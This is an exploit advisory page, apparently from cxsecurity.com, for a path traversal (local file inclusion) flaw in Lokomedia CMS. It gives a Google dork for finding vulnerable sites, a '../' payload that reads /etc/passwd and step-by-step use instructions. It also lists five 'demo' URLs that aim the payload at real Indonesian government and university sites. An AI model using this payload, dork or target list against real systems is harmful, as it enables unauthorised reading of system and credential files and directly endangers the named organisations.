Lokomedia CMS LFI Vulnerability

2018.07.11
id 0N3R1D3R (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

*************************************************** # Exploit Title: Lokomedia CMS LFI Vulnerability # Google Dork: inurl:/semua-download.html # Exploit: ../../../../../../../../../../etc/passwd # Date: 10/07/2018 # Author: 0N3R1D3R # Team: Error Violence # Tested on: Windows 10 x64 *************************************************** [+] Search the dork in Google [+] Get and copy a download file, ex ( http://www.target.com/downlot.php?file=wadadaw.pdf ) [+] Change file with exploit in the target, ex ( http://www.target.com/download.php?file=../../../../../../../../../../etc/passwd ) [+] Open the file with text editor *************************************************** [+] Demo Site [+] http://solokkab.go.id/include/downlot.php?file=../../../../../../../../../../etc/passwd [+] http://www.bengkaliskab.go.id/downlot.php?file=../../../../../../../../../../etc/passwd [+] http://www.kapuashulukab.go.id/downlot.php?file=../../../../../../../../../../etc/passwd [+] http://kpu-boyolali.go.id/downlot.php?file=../../../../../../../../../../etc/passwd [+] http://staiyasnibungo.ac.id/download.php?file=../../../../../../../../../../etc/passwd *************************************************** Thanks To Error Violence

References:

Personal research


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top